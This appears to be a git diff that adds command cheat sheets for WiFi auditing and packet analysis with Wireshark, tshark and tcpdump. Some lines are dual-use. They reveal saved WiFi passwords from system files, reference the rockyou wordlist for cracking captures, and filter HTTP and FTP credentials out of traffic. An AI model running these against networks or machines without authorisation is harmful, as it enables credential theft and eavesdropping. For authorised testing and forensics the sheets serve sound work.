+
+# Show saved WiFi passwords (Linux)
+sudo cat /etc/NetworkManager/system-connections/* | grep psk=
+
+# Show saved WiFi passwords (Windows)
+netsh wlan show profile name="<ssid>" key=clear
+
+$ interface: iw dev | grep Interface | awk '{print $2}'
+$ monitor_interface: iw dev | grep Interface | awk '{print $2}' | head -1
+$ channel: echo "1\n6\n11"
+$ bssid: echo ""
+$ client_mac: echo ""
+$ output_prefix: echo "capture"
+$ capture_file: find . -name "*.cap" -o -name "*.pcap" 2>/dev/null
+$ wordlist: echo "/usr/share/wordlists/rockyou.txt"
+$ count: echo "5\n10\n0" --- --header "0=continuous"
+$ ssid: echo ""
diff --git a/wireshark.cheat b/wireshark.cheat
new file mode 100644
index 0000000..4818a7a
--- /dev/null
+++ b/wireshark.cheat
@@ -0,0 +1,94 @@
+% wireshark, tshark, tcpdump, packets, network-analysis
+
+# Wireshark - open GUI
+wireshark
+
+# Wireshark - open specific file
+wireshark <pcap_file>
+
+# tshark - capture on interface
+sudo tshark -i <interface>
+
+# tshark - capture to file
+sudo tshark -i <interface> -w <output_pcap>
+
+# tshark - read pcap file
+tshark -r <pcap_file>
+
+# tshark - filter by IP
+tshark -r <pcap_file> -Y "ip.addr == <ip>"
+
+# tshark - filter by port
+tshark -r <pcap_file> -Y "tcp.port == <port>"
+
+# tshark - HTTP traffic only
+tshark -r <pcap_file> -Y "http"
+
+# tshark - DNS traffic only
+tshark -r <pcap_file> -Y "dns"
+
+# tshark - follow TCP stream
+tshark -r <pcap_file> -z follow,tcp,ascii,<stream_number>
+
+# tshark - extract HTTP objects
+tshark -r <pcap_file> --export-objects http,<output_dir>
+
+# tshark - show conversations
+tshark -r <pcap_file> -z conv,tcp
+
+# tshark - protocol hierarchy
+tshark -r <pcap_file> -z io,phs
+
+# tshark - credentials (basic)
+tshark -r <pcap_file> -Y "http.authorization or ftp.request.command == USER or ftp.request.command == PASS"
+
+# tcpdump - capture on interface
+sudo tcpdump -i <interface>
+
+# tcpdump - capture to file
+sudo tcpdump -i <interface> -w <output_pcap>
+
+# tcpdump - read pcap
+tcpdump -r <pcap_file>
+
+# tcpdump - filter by host
+sudo tcpdump -i <interface> host <ip>
+
+# tcpdump - filter by port
+sudo tcpdump -i <interface> port <port>
+
+# tcpdump - filter by network
+sudo tcpdump -i <interface> net <network_cidr>
+
+# tcpdump - verbose with hex
+sudo tcpdump -i <interface> -XX -vv
+
+# tcpdump - no DNS resolution
+sudo tcpdump -i <interface> -n
+
+# Common Wireshark display filters:
+# ip.addr == 192.168.1.1
+# tcp.port == 443
+# http.request.method == "POST"
+# dns.qry.name contains "evil"
+# tcp.flags.syn == 1 and tcp.flags.ack == 0
+# frame contains "password"
+# ssl.handshake.type == 1
+
+# Extract files from pcap with binwalk
+binwalk -e <pcap_file>
+
+# NetworkMiner (GUI) - extract artifacts
+networkminer <pcap_file>
+
+# Zeek - generate logs from pcap
+zeek -r <pcap_file>
+
+$ interface: ip link show | grep -E "^[0-9]" | cut -d: -f2 | tr -d ' ' | grep -v lo
+$ pcap_file: find . -name "*.pcap" -o -name "*.pcapng" 2>/dev/null
+$ output_pcap: echo "capture.pcap"
+$ ip: echo ""
+$ port: echo "80\n443\n22\n21\n53"
+$ network_cidr: echo "192.168.1.0/24"
+$ stream_number: echo "0"
+$ output_dir: echo "extracted"